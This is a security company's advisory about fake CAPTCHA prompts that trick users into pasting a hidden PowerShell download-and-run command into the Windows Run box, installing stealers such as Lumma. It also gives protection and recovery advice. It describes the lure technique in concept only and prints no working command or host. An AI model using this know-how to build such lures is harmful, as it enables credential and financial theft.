For the information of our readership, Whiteblueocean is today issuing a warning on the dangers of malicious CAPTCHA requests found in websites and potentially in applications. Global security researchers have observed malicious CAPTCHAs being used as a means of installing stealers onto victim's computers, harvesting valuable data including emails, passwords, addresses and financial information. The attacks being conducted include watering hole attacks, ad abuse and SEO poisoning.

Malicious CAPTCHAs are being used in a variety of malware campaigns, usually designed to target specific demographics. For example, PDF files ostensibly containing instructions for using or installing cheats in video games are being distributed to gamers by SEO or algorithm poisoning. This technique allows for the malware to spread through Google and other search engines, through YouTube video descriptions and TikTok captions, and via online PDF libraries. These CAPTCHAs have also appeared on real, legitimate websites after compromise by a bad actor in what is known as a watering hole attack.

How the Attack Works

This attack vector can be found at any point while innocently browsing the internet, such as through embedded adverts, malicious search engine results, social media, watering hole attacks and phishing attempts. Through SEO poisoning, web users may come across this attack using search engines such as Google, Bing and Yahoo. Results from search engines may display a PDF file hosted on legitimate websites such as WebFlow, or by indexed PDF libraries. Alternatively, websites have been compromised to display this malicious CAPTCHA in various watering hole attacks, displaying the prompt over their ordinary content.

The CAPTCHA displayed is visually very similar to those typically used on many other websites, however offer some instructions that may catch some people off-guard. The first thing presented to the end user is a check box, with instructions to press in the box in order to progress the verification process. This is common practice and will not initially raise suspicions, however, once the check box is marked the CAPTCHA moves on to provide some additional instructions that are atypical for this type of human verification:

Figure 1: Example of CAPTCHA embedded into website that was compromised in a watering hole attack, taken from the University of Michigan and edited for visibility.

The instructions may immediately ring alarm bells for many of our readers who will recognise this as a non-standard and dangerous way to implement a CAPTCHA check. This technique has nevertheless been effective in the infection of countless devices. When a victim interacts with the UI of the CAPTCHA window, a string is copied to their clipboard that includes a dangerous PowerShell command. PowerShell is a powerful scripting language that is primarily used on Windows but can also be executed on MacOS and Linux environments. The command is a string of text copied onto the clipboard which, when executed, instructs the user's device to download a payload from a remote host. The payload is reported to be delivered in the form of a malicious PNG image. This is done as image file formats are not commonly scanned for malicious code by antivirus solutions, making it an easy way to obfuscate malware. This also extends to other image, audio and video formats.

Figure 2: Example of the Run window interface opened using Win + R where PowerShell and other scripting languages can be used.

The interface for the "Run" window, opened using Win + R on Windows devices, has a small box for entering text into. Unwitting users who paste their clipboard into the text box may still be unaware of the contents of the string, as only the end of the string will be displayed to them. The end of this string may state some innocuous phrase such as "I am not a robot", formatted as a comment so as not to invalidate the rest of the code, but to the left of this and initially invisible to the user is a command to download and execute malware from a remote host.

Figure 3: An example of a malicious string copied to the clipboard which will download malware once executed from the Run window - in this instance, the script downloads a copy of the Lumma stealer formatted as an .m4a file, an audio file format, however the actual code of this file  will not function as audio and will instead be used to execute more malicious code on the victim's device. Screenshot taken from Netskope's Threat Lab. (Taken 06/03/2025)

Reportedly, similar techniques exist where the CAPTCHA is embedded in PDF files downloaded from the internet such as through Google or through PDF libraries. These PDFs have also been distributed by email, though PC users may not so readily believe a CAPTCHA check displayed in a local file. Modern browsers, where users will be much more expectant of a CAPTCHA check, are able to display PDF files seamlessly after downloading them, and many PDF libraries have an integrated viewing interface. CAPTCHAs displayed within the browser window are much more likely to fool the end user into following the instructions.

The end result differs greatly on the type of malware being installed. Victims report receiving alerts after their computer automatically blocks some network connections and having their browsers being automatically rolled back to unofficial versions which are compatible with the malware being installed. Whiteblueocean has acquired evidence of the output of these stealers, including full reports of the victim's cookie sessions, saved usernames, emails, passwords, address and financial details, as well as access to browser plugin-based crypto wallets.

Protecting Yourself

Although this kind of attack may seem simple to avoid, we are all vulnerable to human error. You may be tired, your guard may be down, and you may not be expecting to be hit by a virus at that moment in time. However, anybody can fall victim to these attacks as simple as they may seem. Here are a few key takeaways in order to protect yourself from a CAPTCHA-based attack.

• A legitimate CAPTCHA will never ask you to use the Run window for any purpose.
• If you see a CAPTCHA check on a website or application where you don't expect it, double check - even legitimate websites can be compromised by hackers.
• Use a secure password manager and employ Multi-Factor Authentication (MFA) to manage and protect your passwords.
• Practice good cyber hygiene and exercise vigilance when browsing the internet.

"I ran a command in Run program window and my computer was hacked, what do I do?"

Calm yourself down and move ahead with standard remediation strategies in order of priority. If you believe your financial information may have been accessed then consider freezing your cards and online banking. Your online accounts may also have been compromised, and you should bear in mind that activity on your PC could be being monitored. Therefore, on a separate device if possible, attempt to change your passwords prioritising financial accounts and email providers.

If you find that your accounts have been stolen and the credentials changed, you will need to contact that website or application's support team to have the change amended.

You can ensure the safety of your computer by backing up important files either via the cloud or by physical drive and installing a clean instance of your operating system. Make sure any files that you back up are scanned to ensure that the malware is not embedding itself within other files on your device. Beware that new OS partitions can still be reinfected by old ones remaining on the device.

Conclusion

CAPTCHA attacks are successful due to many victims being ill-informed on today's threat landscape, and due to human error. We hope that this article has shed light on this new vector of cyber attack and that this knowledge helps protect you from such attacks in the future. However, we must also reiterate the importance of your own vigilance. Whether it's CAPTCHA or some other technology, it is easy to become comfortable and forget to do the usual checks for safety and legitimacy, and this is how such simple attacks continue to be so successful. So in conclusion, resist the urge to let your guard down even when faced with the fuss of a CAPTCHA check. Follow best practices, stay informed, and your device and your data will be much, much safer as a result.

Sources

https://www.whiteblueocean.com/glossary/

https://www.hdblog.it/sicurezza/articoli/n603265/captcha-attacco-hacker-pc-windows-come-funziona/

https://thehackernews.com/2025/02/5000-phishing-pdfs-on-260-domains.html?_m=3n.009a.3605.io0ao44blc.2mm0

https://www.cylab.cmu.edu/partners/success-stories/recaptcha.html

https://safecomputing.umich.edu/security-alerts/fake-captcha-initiates-malware

https://www.netskope.com/blog/fake-captchas-malicious-pdfs-seo-traps-leveraged-for-user-manual-searches

The information contained in this article is provided for informational purposes only and does not constitute professional advice and is not guaranteed to be accurate, complete, reliable, current or error-free.